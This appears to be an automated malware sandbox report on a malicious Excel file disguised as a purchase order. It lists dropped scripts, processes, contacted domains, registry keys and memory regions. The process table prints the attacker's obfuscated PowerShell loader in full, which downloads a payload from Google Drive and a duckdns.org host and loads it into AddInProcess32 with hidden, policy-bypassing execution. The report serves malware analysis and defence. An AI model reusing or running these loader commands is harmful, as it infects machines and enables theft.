Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Orden de Compra No. 78986756565344657.xlam.xlsx
|
Microsoft Excel 2007+
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wednesdaysMPDW-constraints[1].vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\Desktop\~$Orden de Compra No. 78986756565344657.xlam.xlsx
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bgfgo5mr.ab3.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\fng3ykdr.q3d.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\j4ib2yoe.4gc.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\w4r4vben.wht.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\Desktop\~$Orden de Compra No. 78986756565344657.xlam.xls
|
data
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
|
|
|
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
|
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
|
|
|
|
C:\Windows\SysWOW64\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur
wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText
= [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex
= vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex
-gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command
= vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF
ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly
= [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l,
@(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+',
wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36
-rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
|
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://paste.ee/d/nwtkd
|
188.114.96.3
|
|
|
|
http://wednesdayyyyyyfile.duckdns.org/equitosssssssdroidlatest.txt
|
198.46.178.134
|
|
|
|
https://drive.google.com
|
unknown
|
|
|
|
http://wednesdayyyyyyfile.duckdns.org/wednesdaysMPDW-constraints.vbs
|
198.46.178.134
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://account.dyn.com/
|
unknown
|
||
|
http://crl.entrust.net/server1.crl0
|
unknown
|
||
|
https://paste.ee/d/nwtkdE6
|
unknown
|
||
|
http://ocsp.entrust.net03
|
unknown
|
||
|
http://wednesdayyyyyyfile.duckdns.org/wednesdaysMPDW-constraints.vbsj
|
unknown
|
||
|
http://paste.ee/d/nwtk
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
http://www.diginotar.nl/cps/pkioverheid0
|
unknown
|
||
|
http://paste.ee/d/nwtkd
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
|
unknown
|
||
|
http://paste.ee/d/nwtkd(M
|
unknown
|
||
|
http://wednesdayyyyyyfile.duckdns.org/wednesdaysMPDW-constraints.vbs024C:
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://ip-api.com
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
https://drive.usercontent.google.com
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
http://ocsp.entrust.net0D
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.comodo.com/CPS0
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
||
|
http://crl.entrust.net/2048ca.crl0
|
unknown
|
||
|
https://github.com/dahall/taskscheduler
|
unknown
|
||
|
http://ip-api.com/line/?fields=hosting
|
208.95.112.1
|
There are 27 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
wednesdayyyyyyfile.duckdns.org
|
198.46.178.134
|
|
|
|
paste.ee
|
188.114.96.3
|
|
|
|
ip-api.com
|
208.95.112.1
|
|
|
|
drive.google.com
|
216.58.206.46
|
||
|
drive.usercontent.google.com
|
142.250.186.97
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
208.95.112.1
|
ip-api.com
|
United States
|
|
|
|
198.46.178.134
|
wednesdayyyyyyfile.duckdns.org
|
United States
|
|
|
|
188.114.96.3
|
paste.ee
|
European Union
|
|
|
|
142.250.186.97
|
drive.usercontent.google.com
|
United States
|
||
|
216.58.206.46
|
drive.google.com
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
|
Blob
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
|
Blob
|
|
|
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
}c/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
|
Enabled
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
|
MTTT
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
|
g/
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
|
1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
EXCELFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
ProductFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
|
VBAFiles
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
|
EquationEditorFilesIntl_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400100000000F01FEC\Usage
|
EquationEditorFilesIntl_1033
|
||
|
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
|
SavedLegacySettings
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileDirectory
|
There are 35 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
6350000
|
trusted library section
|
page read and write
|
|
|
|
74EA000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
4F4C000
|
stack
|
page read and write
|
||
|
1D50000
|
trusted library allocation
|
page read and write
|
||
|
43ED000
|
stack
|
page read and write
|
||
|
A190000
|
heap
|
page read and write
|
||
|
1F5000
|
trusted library allocation
|
page execute and read and write
|
||
|
26AE000
|
trusted library allocation
|
page read and write
|
||
|
2D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F2000
|
trusted library allocation
|
page read and write
|
||
|
4F10000
|
heap
|
page read and write
|
||
|
720000
|
trusted library allocation
|
page read and write
|
||
|
6FE000
|
stack
|
page read and write
|
||
|
277D000
|
trusted library allocation
|
page read and write
|
||
|
69E000
|
stack
|
page read and write
|
||
|
282000
|
heap
|
page read and write
|
||
|
33A9000
|
trusted library allocation
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
465D000
|
stack
|
page read and write
|
||
|
4E23000
|
heap
|
page read and write
|
||
|
597000
|
heap
|
page read and write
|
||
|
B561000
|
trusted library allocation
|
page read and write
|
||
|
38D000
|
stack
|
page read and write
|
||
|
995D000
|
heap
|
page read and write
|
||
|
1C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
2416000
|
trusted library allocation
|
page read and write
|
||
|
20BE000
|
stack
|
page read and write
|
||
|
2330000
|
heap
|
page read and write
|
||
|
38F000
|
heap
|
page read and write
|
||
|
524000
|
heap
|
page read and write
|
||
|
2E0000
|
heap
|
page read and write
|
||
|
5FD0000
|
heap
|
page read and write
|
||
|
857000
|
heap
|
page read and write
|
||
|
4ACE000
|
stack
|
page read and write
|
||
|
2430000
|
trusted library allocation
|
page read and write
|
||
|
1CDE000
|
stack
|
page read and write
|
||
|
76E000
|
stack
|
page read and write | page guard
|
||
|
625F000
|
stack
|
page read and write
|
||
|
9FAF000
|
stack
|
page read and write
|
||
|
1E0E000
|
stack
|
page read and write | page guard
|
||
|
4CDE000
|
stack
|
page read and write
|
||
|
3381000
|
trusted library allocation
|
page read and write
|
||
|
42B0000
|
trusted library allocation
|
page read and write
|
||
|
236F000
|
heap
|
page read and write
|
||
|
517000
|
heap
|
page read and write
|
||
|
1DC0000
|
trusted library allocation
|
page read and write
|
||
|
4D8F000
|
stack
|
page read and write
|
||
|
4DF000
|
heap
|
page read and write
|
||
|
592000
|
heap
|
page read and write
|
||
|
5110000
|
heap
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
2190000
|
trusted library allocation
|
page read and write
|
||
|
290000
|
trusted library allocation
|
page read and write
|
||
|
757000
|
heap
|
page read and write
|
||
|
6561000
|
trusted library allocation
|
page read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
618E000
|
stack
|
page read and write
|
||
|
1D70000
|
trusted library allocation
|
page read and write
|
||
|
26F6000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
4B0E000
|
stack
|
page read and write | page guard
|
||
|
1FD0000
|
trusted library allocation
|
page read and write
|
||
|
5FCF000
|
stack
|
page read and write
|
||
|
27FA000
|
trusted library allocation
|
page read and write
|
||
|
4EE1000
|
heap
|
page read and write
|
||
|
1E0F000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1FE5000
|
trusted library allocation
|
page read and write
|
||
|
75E000
|
heap
|
page read and write
|
||
|
2521000
|
trusted library allocation
|
page read and write
|
||
|
23EE000
|
stack
|
page read and write
|
||
|
2000000
|
trusted library allocation
|
page execute and read and write
|
||
|
458000
|
trusted library allocation
|
page read and write
|
||
|
2394000
|
heap
|
page read and write
|
||
|
2250000
|
heap
|
page read and write
|
||
|
1CE0000
|
heap
|
page read and write
|
||
|
2374000
|
heap
|
page read and write
|
||
|
21E0000
|
trusted library allocation
|
page read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
505E000
|
stack
|
page read and write
|
||
|
1B0000
|
trusted library allocation
|
page read and write
|
||
|
4964000
|
heap
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
1E20000
|
trusted library allocation
|
page read and write
|
||
|
2354000
|
heap
|
page read and write
|
||
|
AF61000
|
trusted library allocation
|
page read and write
|
||
|
2916000
|
trusted library allocation
|
page read and write
|
||
|
524000
|
heap
|
page read and write
|
||
|
5FCE000
|
stack
|
page read and write | page guard
|
||
|
2388000
|
heap
|
page read and write
|
||
|
4B1F000
|
stack
|
page read and write
|
||
|
9D6C000
|
stack
|
page read and write
|
||
|
43E1000
|
trusted library allocation
|
page read and write
|
||
|
1D86000
|
heap
|
page execute and read and write
|
||
|
7EF40000
|
trusted library allocation
|
page execute and read and write
|
||
|
621E000
|
stack
|
page read and write
|
||
|
240000
|
trusted library allocation
|
page read and write
|
||
|
1C9D000
|
stack
|
page read and write
|
||
|
597000
|
heap
|
page read and write
|
||
|
650000
|
trusted library allocation
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
2A2000
|
trusted library allocation
|
page read and write
|
||
|
233B000
|
heap
|
page read and write
|
||
|
174000
|
trusted library allocation
|
page read and write
|
||
|
576000
|
heap
|
page read and write
|
||
|
3501000
|
trusted library allocation
|
page read and write
|
||
|
300000
|
heap
|
page read and write
|
||
|
9E6C000
|
stack
|
page read and write
|
||
|
660000
|
trusted library allocation
|
page read and write
|
||
|
2383000
|
heap
|
page read and write
|
||
|
529000
|
heap
|
page read and write
|
||
|
3E0000
|
trusted library allocation
|
page read and write
|
||
|
5080000
|
heap
|
page read and write
|
||
|
850000
|
heap
|
page read and write
|
||
|
2230000
|
trusted library allocation
|
page execute and read and write
|
||
|
790000
|
heap
|
page read and write
|
||
|
61C000
|
heap
|
page read and write
|
||
|
6B0000
|
trusted library allocation
|
page read and write
|
||
|
270000
|
trusted library allocation
|
page read and write
|
||
|
4DD0000
|
heap
|
page read and write
|
||
|
5A5000
|
heap
|
page read and write
|
||
|
237F000
|
stack
|
page read and write
|
||
|
2399000
|
heap
|
page read and write
|
||
|
4F64000
|
heap
|
page read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
515000
|
heap
|
page read and write
|
||
|
596000
|
heap
|
page read and write
|
||
|
2310000
|
heap
|
page read and write
|
||
|
4EE000
|
heap
|
page read and write
|
||
|
42B0000
|
trusted library allocation
|
page read and write
|
||
|
2130000
|
heap
|
page execute and read and write
|
||
|
4EA0000
|
heap
|
page read and write
|
||
|
4D7D000
|
stack
|
page read and write
|
||
|
42AE000
|
stack
|
page read and write
|
||
|
507000
|
heap
|
page read and write
|
||
|
21AE000
|
stack
|
page read and write
|
||
|
1F0000
|
trusted library allocation
|
page read and write
|
||
|
527000
|
heap
|
page read and write
|
||
|
1F30000
|
trusted library allocation
|
page read and write
|
||
|
700000
|
trusted library allocation
|
page read and write
|
||
|
2110000
|
trusted library allocation
|
page read and write
|
||
|
293F000
|
stack
|
page read and write
|
||
|
51FE000
|
stack
|
page read and write
|
||
|
1F48000
|
heap
|
page read and write
|
||
|
9B3F000
|
stack
|
page read and write
|
||
|
22D2000
|
trusted library allocation
|
page read and write
|
||
|
710000
|
trusted library allocation
|
page read and write
|
||
|
630000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D80000
|
direct allocation
|
page read and write
|
||
|
A14D000
|
stack
|
page read and write
|
||
|
62EA000
|
trusted library allocation
|
page read and write
|
||
|
536000
|
heap
|
page read and write
|
||
|
5F6000
|
heap
|
page read and write
|
||
|
544000
|
heap
|
page read and write
|
||
|
279C000
|
trusted library allocation
|
page read and write
|
||
|
4E0000
|
trusted library allocation
|
page read and write
|
||
|
3FD0000
|
heap
|
page read and write
|
||
|
17D000
|
trusted library allocation
|
page execute and read and write
|
||
|
3510000
|
heap
|
page read and write
|
||
|
62F3000
|
trusted library allocation
|
page read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
59C000
|
heap
|
page read and write
|
||
|
1D0000
|
trusted library allocation
|
page read and write
|
||
|
21DF000
|
stack
|
page read and write
|
||
|
14A000
|
stack
|
page read and write
|
||
|
524000
|
heap
|
page read and write
|
||
|
37B0000
|
heap
|
page read and write
|
||
|
780000
|
trusted library allocation
|
page read and write
|
||
|
1CC000
|
stack
|
page read and write
|
||
|
296000
|
trusted library allocation
|
page execute and read and write
|
||
|
A3E0000
|
trusted library allocation
|
page read and write
|
||
|
44EF000
|
stack
|
page read and write
|
||
|
32DF000
|
stack
|
page read and write
|
||
|
A0EF000
|
stack
|
page read and write
|
||
|
3C30000
|
heap
|
page read and write
|
||
|
76F000
|
stack
|
page read and write
|
||
|
3E50000
|
heap
|
page read and write
|
||
|
1FDC000
|
trusted library allocation
|
page read and write
|
||
|
2C0000
|
heap
|
page read and write
|
||
|
26CB000
|
trusted library allocation
|
page read and write
|
||
|
504000
|
heap
|
page read and write
|
||
|
59A000
|
heap
|
page read and write
|
||
|
1D80000
|
heap
|
page execute and read and write
|
||
|
4DD000
|
heap
|
page read and write
|
||
|
235E000
|
stack
|
page read and write
|
||
|
251A000
|
trusted library allocation
|
page read and write
|
||
|
4B7E000
|
stack
|
page read and write
|
||
|
21F0000
|
heap
|
page read and write
|
||
|
A3E0000
|
heap
|
page read and write
|
||
|
2B98000
|
heap
|
page read and write
|
||
|
542D000
|
heap
|
page read and write
|
||
|
1F3E000
|
stack
|
page read and write
|
||
|
514E000
|
stack
|
page read and write
|
||
|
27BC000
|
trusted library allocation
|
page read and write
|
||
|
54BE000
|
stack
|
page read and write
|
||
|
300000
|
heap
|
page read and write
|
||
|
30F9000
|
heap
|
page read and write
|
||
|
9D2E000
|
stack
|
page read and write
|
||
|
378000
|
heap
|
page read and write
|
||
|
2C0000
|
trusted library allocation
|
page read and write
|
||
|
516E000
|
stack
|
page read and write
|
||
|
24C0000
|
heap
|
page execute and read and write
|
||
|
9940000
|
heap
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
413E000
|
stack
|
page read and write
|
||
|
26BE000
|
trusted library allocation
|
page read and write
|
||
|
4F0000
|
trusted library allocation
|
page read and write
|
||
|
51A000
|
heap
|
page read and write
|
||
|
1FE0000
|
trusted library allocation
|
page read and write
|
||
|
1F2B000
|
stack
|
page read and write
|
||
|
18D000
|
trusted library allocation
|
page execute and read and write
|
||
|
62F1000
|
trusted library allocation
|
page read and write
|
||
|
2DF0000
|
heap
|
page read and write
|
||
|
61E000
|
heap
|
page read and write
|
||
|
275000
|
trusted library allocation
|
page execute and read and write
|
||
|
2A7000
|
trusted library allocation
|
page execute and read and write
|
||
|
26B5000
|
trusted library allocation
|
page read and write
|
||
|
222E000
|
stack
|
